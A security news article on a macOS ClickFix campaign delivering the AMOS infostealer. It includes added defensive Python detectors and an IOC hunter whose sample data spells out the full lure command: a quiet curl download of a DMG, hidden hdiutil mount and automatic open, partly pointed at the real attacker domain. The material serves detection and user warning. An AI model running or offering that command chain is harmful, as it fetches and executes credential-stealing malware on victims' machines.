
MacOS ClickFix Attack Exploits Terminal Commands to Spread Infostealer

"A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info‑stealing malware from malicious disk image (DMG) files," researchers at Palo Alto Networks Unit 42 report.

How the ClickFix Terminal command chain operates

Palo Alto Networks Unit 42 says the campaign opens with a fake CAPTCHA page that instructs a visitor to open macOS Terminal and paste a command to “verify” themselves. If the user complies, the single command sequence performs four linked actions: it uses curl with the quiet flags "-fsSL" to download a DMG to /tmp under a randomized filename; it calls macOS's native hdiutil with "attach -nobrowse" to mount the disk image without showing it in Finder or on the desktop; it searches up to three directory levels for the first .app or .pkg installer inside the mounted volume; and it launches that installer automatically with the macOS open command.

Palo Alto observed a delivered disk image named "s.01M0td.dmg" which mounted a volume containing a self‑signed application bundle titled "NNApp.app." The researchers note the approach combines quiet DMG mounting with automatic execution, differing from earlier DMG-based ClickFix lures that relied on victims to manually open a downloaded image.
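As an added example (not Unit 42's code or any artifact from the report), the script below decomposes a captured Terminal command line, such as one pulled from shell history or an EDR process-exec event, into the four stages the section describes and flags only the combination that marks the ClickFix chain. The sample inputs are constructed; the host name and DMG file name in them are placeholders, and the stage names and regexes are this example's own.

```python
"""Classify a captured macOS command line against the four-stage ClickFix DMG
chain (quiet curl download -> hdiutil attach -nobrowse -> shallow find for an
installer -> open). Added example; patterns and sample lines are constructed."""
import re
from dataclasses import dataclass

# Constructed sample command lines (placeholder host and file names, not real IOCs).
SAMPLES = {
    "clickfix_like": (
        "curl -fsSL https://captcha.example.invalid/v -o /tmp/x9Qw.dmg && "
        "hdiutil attach -nobrowse /tmp/x9Qw.dmg && "
        "open \"$(find /Volumes -maxdepth 3 \\( -name '*.app' -o -name '*.pkg' \\) | head -n 1)\""
    ),
    # A lone hidden mount is ordinary admin behaviour and must not trip the rule.
    "benign_mount": "hdiutil attach -nobrowse ~/Downloads/Tool.dmg",
    # A quiet curl that fetches something other than a disk image.
    "benign_curl": "curl -fsSL https://example.com/file.txt -o notes.txt",
}

# Each stage is searched for on the whole line; [^&;|]* keeps a match inside
# one shell segment so flags from one command are not attributed to another.
STAGE_PATTERNS = {
    # curl with a silent-style flag cluster (e.g. -fsSL) writing a .dmg
    "download_dmg": re.compile(r"\bcurl\b[^&;|]*\s-[A-Za-z]*s[A-Za-z]*\b[^&;|]*\.dmg"),
    # disk image staged under /tmp, as in the observed campaign
    "staged_in_tmp": re.compile(r"/tmp/[^\s\"']*\.dmg"),
    # hdiutil attach -nobrowse hides the mounted volume from Finder and the desktop
    "quiet_mount": re.compile(r"\bhdiutil\s+attach\b[^&;|]*-nobrowse"),
    # find limited to three directory levels looking for an installer bundle
    "locate_installer": re.compile(r"\bfind\b[^&;|]*-maxdepth\s+[1-3]\b[^&;|]*\.(?:app|pkg)"),
    # automatic launch through the macOS open command
    "auto_launch": re.compile(r"\bopen\b"),
}

# Stages that together distinguish the chain from routine use of any one tool.
CORE_STAGES = {"download_dmg", "quiet_mount", "auto_launch"}


@dataclass
class Verdict:
    matched: list
    suspicious: bool


def classify(cmdline: str) -> Verdict:
    """Return the stages found in the line and whether the core chain is present."""
    matched = [name for name, pat in STAGE_PATTERNS.items() if pat.search(cmdline)]
    return Verdict(matched, CORE_STAGES.issubset(matched))


if __name__ == "__main__":
    for label, line in SAMPLES.items():
        v = classify(line)
        print(f"{label:15s} suspicious={v.suspicious} stages={v.matched}")
```

In production the same stage checks would run on the full command line of a process-exec event whose parent is Terminal (or another shell host), so that a benign standalone `hdiutil attach -nobrowse` or a plain quiet `curl` is reported only when the other stages appear alongside it.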

How AMOS (Atomic macOS Stealer) collects and exfiltrates data

The payload the researchers observed belongs to the Atomic macOS Stealer family — AMOS — and is built to harvest a broad set of sensitive artifacts. Unit 42 reports the stealer gathers browser credentials, authentication tokens, browser history, and stored payment cards; it targets macOS system files including Apple Keychain databases and Safari cookies; it harvests Telegram Desktop and Discord data; and it copies Apple Notes databases and user documents with PDF, TXT, or RTF extensions.

All collected material is packaged into a ZIP archive and uploaded to an attacker‑controlled server where the actor can retrieve it, Unit 42 says. The malware also displays a fake System Preferences authentication prompt to solicit the victim’s password directly, enabling the stealer to capture additional credentials.

Browsers, cryptocurrency wallets, and desktop apps targeted

Palo Alto lists the specific software AMOS looks for. On the Chromium side the malware targets eight browsers: Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex, harvesting cookies, login databases, autofill, stored cards, and profile data. For Firefox and Firefox‑derived browsers it targets LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser for the same categories of data.

The stealer also searches for cryptocurrency wallet data across numerous local wallet implementations, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. Notably, Unit 42 found the malware will replace legitimate installations of Ledger Live and Trezor Suite with malicious versions — a likely tactic to enable direct crypto theft by presenting compromised wallet management software to the user.

Command‑and‑control and payload artifacts observed

Unit 42 attributes the campaign’s network activity to attacker infrastructure that included the domain svs‑verificationdate[.]beer and the IP 196.251.107[.]171. The observed DMG filename "s.01M0td.dmg" and the self‑signed application "NNApp.app" are concrete artifacts defenders can search for within telemetry, the researchers say.

Because the hdiutil call uses the -nobrowse option, the mounted volume will not appear in Finder or on the desktop, reducing obvious visual indicators that a disk image has been opened. The script’s automated search and open of the first .app or .pkg found — limited to three directory levels — is a compact and repeatable chain that can be scripted into a single copy‑and‑paste command line, which is exactly how the ClickFix social engineering lure presents it to victims.

What this means for technologists, security teams, and end users

  • Technologists and security teams: Unit 42’s artifacts — the DMG name pattern, NNApp.app, the svs‑verificationdate[.]beer domain, and 196.251.107[.]171 — give concrete IOC (indicator‑of‑compromise) entries to hunt for. The quiet mount behavior (hdiutil attach -nobrowse) and automatic open warrant EDR and process‑monitoring rules that flag command chains invoking curl, hdiutil, and open in rapid succession.
  • Security operations and incident responders: Palo Alto’s writeup underscores a simple detection gap — the entire attack is triggered by a pasted Terminal command. Teams should consider collecting telemetry on Terminal usage and adding controls around automated command execution that originates from browsers or unknown pages.
  • End users: The researchers repeat a single basic rule: if a website tells you to open Terminal and run a command you do not 100% understand, do not run it. The ClickFix lure — fake CAPTCHAs, browser fixes, and system alerts — is the social engineering mechanism that primes victims to paste precisely that dangerous one‑liner.
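The hunting approach the first two bullets describe, as an added example that is not part of the report or Unit 42's tooling: it takes the IOCs exactly as the article publishes them (defanged), refangs them for matching, and runs two checks over constructed EDR-style process and network events, a direct IOC match and a temporal rule that looks for curl, hdiutil attach -nobrowse and open launched in that order by the same parent process within a short window. The event schema, timestamps, process ids and the volume path placeholder are this example's assumptions.

```python
"""Hunt constructed macOS telemetry for the Unit 42 ClickFix IOCs and for the
curl -> hdiutil attach -nobrowse -> open chain in rapid succession.
Added example; the event records below are constructed, not real telemetry."""
import re
from datetime import datetime, timedelta

# IOCs as published in the report (defanged); refang() converts them for matching.
DEFANGED_IOCS = {
    "domain": ["svs-verificationdate[.]beer"],
    "ip": ["196.251.107[.]171"],
    "file": ["s.01M0td.dmg", "NNApp.app"],
}


def refang(value: str) -> str:
    return value.replace("[.]", ".")


IOCS = {kind: [refang(v) for v in vals] for kind, vals in DEFANGED_IOCS.items()}

# Constructed events: ppid 400 stands in for a Terminal session; the volume
# name under /Volumes is a placeholder because the report does not give it.
EVENTS = [
    {"ts": "2024-01-01T10:00:00", "type": "process", "pid": 501, "ppid": 400, "proc": "curl",
     "args": "curl -fsSL https://svs-verificationdate.beer/v -o /tmp/s.01M0td.dmg"},
    {"ts": "2024-01-01T10:00:01", "type": "network", "pid": 501,
     "dest_host": "svs-verificationdate.beer", "dest_ip": "196.251.107.171"},
    {"ts": "2024-01-01T10:00:03", "type": "process", "pid": 502, "ppid": 400, "proc": "hdiutil",
     "args": "hdiutil attach -nobrowse /tmp/s.01M0td.dmg"},
    {"ts": "2024-01-01T10:00:05", "type": "process", "pid": 503, "ppid": 400, "proc": "open",
     "args": "open /Volumes/VOLUME_NAME_PLACEHOLDER/NNApp.app"},
    # Benign admin activity later in the same session: no chain, no IOC.
    {"ts": "2024-01-01T11:30:00", "type": "process", "pid": 610, "ppid": 400, "proc": "hdiutil",
     "args": "hdiutil attach -nobrowse /Users/admin/Downloads/Tool.dmg"},
    # Another session: a quiet curl and a later open, but no hidden mount between them.
    {"ts": "2024-01-01T09:00:00", "type": "process", "pid": 301, "ppid": 300, "proc": "curl",
     "args": "curl -fsSL https://example.com/notes.txt -o notes.txt"},
    {"ts": "2024-01-01T09:10:00", "type": "process", "pid": 302, "ppid": 300, "proc": "open",
     "args": "open notes.txt"},
]

# Ordered stages of the chain; each must match the process name and its arguments.
CHAIN = [
    ("curl", re.compile(r"\bcurl\b")),
    ("hdiutil", re.compile(r"\bhdiutil\s+attach\b.*-nobrowse")),
    ("open", re.compile(r"\bopen\b")),
]


def ioc_hits(events):
    """Return (kind, value, timestamp) for every event containing a known IOC."""
    hits = []
    for ev in events:
        haystack = " ".join(str(v) for v in ev.values())
        for kind, values in IOCS.items():
            for value in values:
                if value in haystack:
                    hits.append((kind, value, ev["ts"]))
    return hits


def find_chains(events, window=timedelta(seconds=60)):
    """Return one record per parent process that ran the three stages in order
    within `window`; a gap longer than the window restarts the matcher."""
    by_parent = {}
    for ev in events:
        if ev["type"] == "process":
            by_parent.setdefault(ev["ppid"], []).append(ev)
    chains = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e["ts"])
        stage, start = 0, None
        for ev in evs:
            name, pat = CHAIN[stage]
            if ev["proc"] != name or not pat.search(ev["args"]):
                continue
            t = datetime.fromisoformat(ev["ts"])
            if stage == 0:
                start = t
            elif t - start > window:
                # Too slow for a single pasted one-liner; start over.
                stage, start = 0, None
                continue
            stage += 1
            if stage == len(CHAIN):
                chains.append({"ppid": ppid, "start": start.isoformat(), "end": ev["ts"]})
                stage, start = 0, None
    return chains


if __name__ == "__main__":
    for hit in ioc_hits(EVENTS):
        print("IOC", *hit)
    for chain in find_chains(EVENTS):
        print("CHAIN", chain)
```

The temporal rule is the more durable of the two: file names, domains and IPs rotate between campaigns, while the curl, hidden mount, open sequence from one shell session is the behaviour the lure depends on.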

Unit 42’s findings show a blended approach: the social‑engineering simplicity of ClickFix plus a technical twist that hides the disk image from casual observation. With device credentials, Keychain entries, messaging data, and cryptocurrency wallets on the line — and with the Picus whitepaper cited in the report noting that security teams log 54% of successful attacks but alert on only 14% — the campaign is a reminder that small user actions can unlock broad data access for an attacker.

https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/